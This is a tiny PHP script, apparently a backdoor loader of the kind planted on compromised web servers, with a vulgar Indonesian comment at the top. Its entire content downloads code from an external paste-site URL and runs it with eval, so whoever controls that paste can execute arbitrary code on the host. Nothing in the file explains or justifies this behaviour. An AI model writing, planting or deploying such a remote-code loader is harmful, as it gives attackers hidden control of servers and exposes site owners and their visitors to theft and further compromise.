<?php
    //KONTOL
    $url = 'https://pastee.dev/r/Dc6HBNSZ/0';

    $code = file_get_contents($url);

    // 
    eval('?>' . $code);
    ?>